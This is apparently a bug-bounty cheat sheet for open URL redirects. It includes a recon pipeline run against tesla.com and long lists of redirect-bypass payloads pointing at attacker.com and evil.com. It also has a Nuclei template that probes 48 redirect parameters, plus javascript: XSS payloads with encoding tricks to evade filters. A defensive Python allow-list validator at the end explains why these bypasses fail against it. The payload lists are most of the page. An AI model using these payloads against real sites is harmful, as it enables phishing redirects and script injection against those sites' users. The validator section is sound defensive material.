You should be looking for open URL redirects in the following areas of your target:
```shell
echo "http://tesla.com" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew
```
https://evil.com ❌
https:evil.com ✅
```text
# Bypass an HTTP scheme blacklist
//attacker.com
/%0A/attacker.com
/%0D/attacker.com
/%09/attacker.com
/+/attacker.com
///attacker.com
\\attacker.com
\/\/attacker.com/
/\/attacker.com/
//attacker%00.com
# Bypass a URI authority component (//) blacklist
http:example.com
https:example.com
# Bypass weak domain validation
https://example.com@attacker.com
https://example.com.attacker.com
https://attacker.com/example.com
https://attacker.com?example.com
https://web-attacker.com?https://example.com
https://attacker.com%23example.com
https://attacker.com%00example.com
https://attacker.com%0Aexample.com
https://attacker.com%0Dexample.com
https://attacker.com%09example.com
https://example.com°attacker.com
target.com%40attacker.com
target.com?attacker.com
# Bypass weak top-level domain (TLD) validation
https://example.comattacker.com
https://example.com.mx
https://example.company # .company is a valid TLD
https://attacker.com%E3%80%82example.com # URL-encoded ideographic full stop (U+3002), which browsers accept as a label separator
attacker%E3%80%82com
```
```text
/%09/google.com
/%5cgoogle.com
//www.google.com/%2f%2e%2e
//www.google.com/%2e%2e
//google.com/
//google.com/%2f..
//\google.com
/\victim.com:80%40google.com
//www.whitelisteddomain.tld@google.com/%2f..
///google.com/%2f..
///www.whitelisteddomain.tld@google.com/%2f..
////google.com/%2f..
////www.whitelisteddomain.tld@google.com/%2f..
https://google.com/%2f..
https://www.whitelisteddomain.tld@google.com/%2f..
/https://google.com/%2f..
/https://www.whitelisteddomain.tld@google.com/%2f..
//www.google.com/%2f%2e%2e
//www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
///www.google.com/%2f%2e%2e
///www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
////www.google.com/%2f%2e%2e
////www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
https://google.com/%2f%2e%2e
https://www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
/https://google.com/%2f%2e%2e
/https://www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
//google.com/
/?next=target.com&next=evil.com
```
Creating folder as victim domain
```text
http://www.yoursite.com/http://www.theirsite.com/
http://www.yoursite.com/folder/www.folder.com
```
```yaml
id: mass_48_open_redirect_check

info:
  name: Mass 48 Param For Open Redirect
  author: SirBugs
  severity: medium

requests:
  - method: GET
    path:
      - "{{BaseURL}}/https://bing.com/"
      - "{{BaseURL}}//https://bing.com//"
      - "{{BaseURL}}/?targetOrigin=https://bing.com/"
      - "{{BaseURL}}/?fallback=https://bing.com/"
      - "{{BaseURL}}/?query=https://bing.com/"
      - "{{BaseURL}}/?redirection_url=https://bing.com/"
      - "{{BaseURL}}/?next=https://bing.com/"
      - "{{BaseURL}}/?ref_url=https://bing.com/"
      - "{{BaseURL}}/?state=https://bing.com/"
      - "{{BaseURL}}/?1=https://bing.com/"
      - "{{BaseURL}}/?redirect_uri=https://bing.com/"
      - "{{BaseURL}}/?forum_reg=https://bing.com/"
      - "{{BaseURL}}/?return_to=https://bing.com/"
      - "{{BaseURL}}/?redirect_url=https://bing.com/"
      - "{{BaseURL}}/?return_url=https://bing.com/"
      - "{{BaseURL}}/?host=https://bing.com/"
      - "{{BaseURL}}/?url=https://bing.com/"
      - "{{BaseURL}}/?redirectto=https://bing.com/"
      - "{{BaseURL}}/?return=https://bing.com/"
      - "{{BaseURL}}/?prejoin_data=https://bing.com/"
      - "{{BaseURL}}/?callback_url=https://bing.com/"
      - "{{BaseURL}}/?path=https://bing.com/"
      - "{{BaseURL}}/?authorize_callback=https://bing.com/"
      - "{{BaseURL}}/?email=https://bing.com/"
      - "{{BaseURL}}/?origin=https://bing.com/"
      - "{{BaseURL}}/?continue=https://bing.com/"
      - "{{BaseURL}}/?domain_name=https://bing.com/"
      - "{{BaseURL}}/?redir=https://bing.com/"
      - "{{BaseURL}}/?wp_http_referer=https://bing.com/"
      - "{{BaseURL}}/?endpoint=https://bing.com/"
      - "{{BaseURL}}/?shop=https://bing.com/"
      - "{{BaseURL}}/?qpt_question_url=https://bing.com/"
      - "{{BaseURL}}/?checkout_url=https://bing.com/"
      - "{{BaseURL}}/?ref_url=https://bing.com/"
      - "{{BaseURL}}/?redirect_to=https://bing.com/"
      - "{{BaseURL}}/?succUrl=https://bing.com/"
      - "{{BaseURL}}/?file=https://bing.com/"
      - "{{BaseURL}}/?link=https://bing.com/"
      - "{{BaseURL}}/?referrer=https://bing.com/"
      - "{{BaseURL}}/?recipient=https://bing.com/"
      - "{{BaseURL}}/?redirect=https://bing.com/"
      - "{{BaseURL}}/?u=https://bing.com/"
      - "{{BaseURL}}/?hostname=https://bing.com/"
      - "{{BaseURL}}/?returnTo=https://bing.com/"
      - "{{BaseURL}}/?return_path=https://bing.com/"
      - "{{BaseURL}}/?image=https://bing.com/"
      - "{{BaseURL}}/?requestTokenAndRedirect=https://bing.com/"
      - "{{BaseURL}}/?retURL=https://bing.com/"
      - "{{BaseURL}}/?next_url=https://bing.com/"
    # Do not follow the redirect: the 3xx response itself, with its Location header, is what gets matched.
    redirects: false
    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "Location: https://bing.com"
      - type: status
        status:
          - 301
          - 302
          - 303
          - 304 # not a redirect and carries no Location header; harmless here only because matchers-condition is "and"
          - 307
          - 308
```
```http
GET /signin?redirectURL=javascript:alert() HTTP/1.1
Host: example.com
```
```text
# Simple bypasses
javascript:alert(1)
JavaScript:alert(1)
JAVASCRIPT:alert(1)
javascript:alert(1);//#
# Bypass weak regex patterns (try repositioning the URL-encoded special characters)
ja%20vascri%20pt:alert(1)
jav%0Aascri%0Apt:alert(1)
jav%0Dascri%0Dpt:alert(1)
jav%09ascri%09pt:alert(1)
# More advanced weak regex pattern bypasses
%19javascript:alert(1)
javascript://%0Aalert(1)
javascript://%0Dalert(1)
javascript://https://example.com%0Aalert(1)
```
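Every bypass class on this page, from the scheme and authority tricks through the weak domain and TLD checks to the `javascript:` payloads above, works against a validator that inspects the raw string with a blacklist; the Python below is an added defensive example, not code from the original page, showing the allow-list approach that rejects all of them: percent-decode, refuse control characters, normalise backslashes, require an exact hostname with no userinfo, and emit an absolute Location. The hostnames in `ALLOWED_HOSTS` and `SITE_ORIGIN` are assumed values for the example.

```python
from urllib.parse import unquote, urljoin, urlsplit

# Constructed allow-list for this example: only these exact hostnames may be redirect targets.
ALLOWED_HOSTS = {"example.com", "www.example.com"}
SITE_ORIGIN = "https://example.com"

def safe_redirect_target(raw, allowed_hosts=ALLOWED_HOSTS, origin=SITE_ORIGIN):
    """Return an absolute URL on an allowed host that is safe to emit in Location, else None."""
    # Percent-decode first so %0A, %09, %40, %23 or %E3%80%82 cannot hide the URL structure from the checks.
    decoded = unquote(raw)
    # Browsers drop ASCII controls, tabs and newlines before parsing; a raw-string regex does not, which
    # is what the %0A/%0D/%09/%00/%19 and "ja vascri pt" payloads exploit. Reject them outright.
    if any(ord(c) <= 0x20 or ord(c) == 0x7F for c in decoded):
        return None
    # Browsers treat "\" like "/" in http(s) URLs, so \\attacker.com and /\attacker.com are
    # scheme-relative. Normalise before parsing so the parser sees what the browser sees.
    normalized = decoded.replace("\\", "/")
    try:
        parts = urlsplit(normalized)
    except ValueError:  # malformed authority (bad IPv6 bracket, NFKC-altered host): reject
        return None
    if parts.scheme:
        # urlsplit lowercases the scheme, so JavaScript:/JAVASCRIPT:/javascript: all land here.
        if parts.scheme not in ("http", "https"):
            return None
        if not parts.netloc:  # "https:evil.com" has an empty netloc here but is absolute to a browser
            return None
    if parts.netloc:
        # Absolute or scheme-relative URL: never allow userinfo (example.com@attacker.com, %40 forms) and
        # require an exact hostname match (rejects example.com.attacker.com, example.company, example.com°attacker.com).
        if parts.username is not None or parts.password is not None:
            return None
        if parts.hostname not in allowed_hosts:
            return None
    elif not normalized.startswith("/") or normalized.startswith("//"):
        # Relative reference: exactly one leading slash. Browsers ignore the extra slashes in //, ///,
        # //// and /\ prefixes and resolve those against a foreign origin.
        return None
    # Resolve against our own origin so Location is absolute; this also neutralises path tricks such
    # as /+/attacker.com or /https://google.com/%2f.. that need a later rewrite of a relative target.
    resolved = urljoin(origin, normalized)
    final = urlsplit(resolved)  # defence in depth: re-parse and confirm we really stayed on an allowed host
    if final.scheme not in ("http", "https") or final.hostname not in allowed_hosts:
        return None
    return resolved

if __name__ == "__main__":  # quick demonstration over a few payload classes from the list above
    for p in ["/account", "https:evil.com", "//attacker.com", "https://example.com@attacker.com",
              "/%09/google.com", "\\\\attacker.com", "/\\/attacker.com/", "javascript://%0Aalert(1)"]:
        print(f"{p!r:40} -> {safe_redirect_target(p)}")
```

Parameter pollution (`/?next=target.com&next=evil.com`) is outside this function's scope: the handler must read exactly one value for the parameter before calling it.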